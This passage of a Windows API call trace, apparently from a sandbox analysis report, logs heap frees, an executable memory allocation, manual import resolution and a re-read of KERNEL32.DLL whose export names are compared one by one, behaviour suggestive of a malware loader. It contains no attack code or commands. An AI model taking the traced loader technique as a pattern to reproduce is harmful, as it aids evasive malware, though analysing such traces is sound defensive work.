hHeap=0x430000) returned 1 [0089.788] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d65cb0 | out: hHeap=0x430000) returned 1 [0089.788] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d78ec0 | out: hHeap=0x430000) returned 1 [0089.788] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d8c0d0 | out: hHeap=0x430000) returned 1 [0089.788] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d9f2e0 | out: hHeap=0x430000) returned 1 [0089.790] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2db24f0 | out: hHeap=0x430000) returned 1 [0089.791] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2dc5700 | out: hHeap=0x430000) returned 1 [0089.791] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2dd8910 | out: hHeap=0x430000) returned 1 [0089.792] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e00080 | out: hHeap=0x430000) returned 1 [0089.792] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e13290 | out: hHeap=0x430000) returned 1 [0089.792] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e264a0 | out: hHeap=0x430000) returned 1 [0089.792] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e396b0 | out: hHeap=0x430000) returned 1 [0089.792] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e4c8c0 | out: hHeap=0x430000) returned 1 [0089.792] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e5fad0 | out: hHeap=0x430000) returned 1 [0089.792] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e72ce0 | out: hHeap=0x430000) returned 1 [0089.792] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e85ef0 | out: hHeap=0x430000) returned 1 [0089.792] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e99100 | out: hHeap=0x430000) returned 1 [0089.797] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2eac310 | out: hHeap=0x430000) returned 1 [0089.798] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ebf520 | out: hHeap=0x430000) returned 1 [0089.798] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ed2730 | out: hHeap=0x430000) returned 1 [0089.798] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ee5940 | out: hHeap=0x430000) returned 1 [0089.799] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ef8b50 | out: hHeap=0x430000) returned 1 [0089.802] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f0bd60 | out: hHeap=0x430000) returned 1 [0089.802] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f1ef70 | out: hHeap=0x430000) returned 1 [0089.802] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f32180 | out: hHeap=0x430000) returned 1 [0089.802] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f45390 | out: hHeap=0x430000) returned 1 [0089.802] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f585a0 | out: hHeap=0x430000) returned 1 [0089.802] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f6b7b0 | out: hHeap=0x430000) returned 1 [0089.804] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f7e9c0 | out: hHeap=0x430000) returned 1 [0089.959] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f91bd0 | out: hHeap=0x430000) returned 1 [0089.959] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fa4de0 | out: hHeap=0x430000) returned 1 [0089.959] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fb7ff0 | out: hHeap=0x430000) returned 1 [0089.959] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fcb200 | out: hHeap=0x430000) returned 1 [0089.960] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fde410 | out: hHeap=0x430000) returned 1 [0089.960] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ff1620 | out: hHeap=0x430000) returned 1 [0089.960] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3004830 | out: hHeap=0x430000) returned 1 [0089.965] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3017a40 | out: hHeap=0x430000) returned 1 [0089.965] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x302ac50 | out: hHeap=0x430000) returned 1 [0089.965] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x303de60 | out: hHeap=0x430000) returned 1 [0089.966] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3051070 | out: hHeap=0x430000) returned 1 [0089.966] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3064280 | out: hHeap=0x430000) returned 1 [0089.966] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3077490 | out: hHeap=0x430000) returned 1 [0089.966] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x308a6a0 | out: hHeap=0x430000) returned 1 [0089.966] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x309d8b0 | out: hHeap=0x430000) returned 1 [0089.966] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30b0ac0 | out: hHeap=0x430000) returned 1 [0089.966] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30c3cd0 | out: hHeap=0x430000) returned 1 [0089.966] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30d6ee0 | out: hHeap=0x430000) returned 1 [0089.966] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30ea0f0 | out: hHeap=0x430000) returned 1 [0089.970] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30fd300 | out: hHeap=0x430000) returned 1 [0089.973] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3110510 | out: hHeap=0x430000) returned 1 [0089.978] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3123720 | out: hHeap=0x430000) returned 1 [0090.802] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0090.804] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0090.805] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0090.805] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0090.806] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0090.806] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0090.806] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0090.806] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0090.806] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0090.806] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0090.806] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0090.807] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0090.807] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0090.807] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0090.807] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0090.807] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0090.807] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0090.807] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0090.807] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0090.808] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0090.808] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0090.808] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0090.808] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0090.808] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0090.808] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0090.808] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0090.808] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0090.808] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45db20 | out: hHeap=0x430000) returned 1 [0090.809] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0090.812] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440200 | out: hHeap=0x430000) returned 1 [0090.814] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0090.814] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0090.814] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0090.814] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0090.815] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0090.815] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0090.976] GetProcessHeap () returned 0x430000 [0090.976] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x68) returned 0x438ce0 [0090.977] GetProcessHeap () returned 0x430000 [0090.977] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449280 [0090.978] GetProcessHeap () returned 0x430000 [0090.978] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x48) returned 0x4405c0 [0090.978] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0090.978] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0090.978] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0090.978] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0090.978] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0090.978] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0090.978] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0090.978] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0090.978] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0090.978] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0090.979] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0090.979] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0090.979] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0090.979] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0090.979] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0090.980] GetProcessHeap () returned 0x430000 [0090.980] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xac430) returned 0x45c5d0 [0090.982] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0090.982] ReadFile (in: hFile=0x134, lpBuffer=0x45c5d0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x45c5d0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0090.989] CloseHandle (hObject=0x134) returned 1 [0090.989] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0090.995] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0090.995] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0090.995] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0090.995] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0090.995] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0090.995] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0090.995] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0090.995] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0090.995] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0090.995] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0090.995] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0090.996] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0090.996] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0090.996] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0090.996] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0090.996] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0090.996] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0090.996] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0090.996] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0090.996] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0090.996] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0090.996] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0090.996] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0090.997] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0090.997] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0090.997] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0090.997] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0090.997] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0090.997] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0090.997] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0090.997] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0090.997] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0090.997] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0090.997] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0090.997] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0090.997] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0090.997] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0090.997] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0090.997] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0090.997] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0090.997] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0090.997] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0090.998] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0090.998] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0090.998] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0090.998] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0090.998] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0090.998] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0090.998] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0090.998] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0090.998] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0090.998] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0090.998] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0090.998] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0090.998] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0090.999] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0090.999] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0090.999] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0090.999] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0090.999] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0090.999] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0091.000] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0091.000] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0091.000] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0091.000] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0091.000] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0091.000] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0091.000] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0091.000] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0091.000] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0091.000] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0091.000] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0091.001] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0091.001] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0091.001] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0091.001] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0091.001] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", 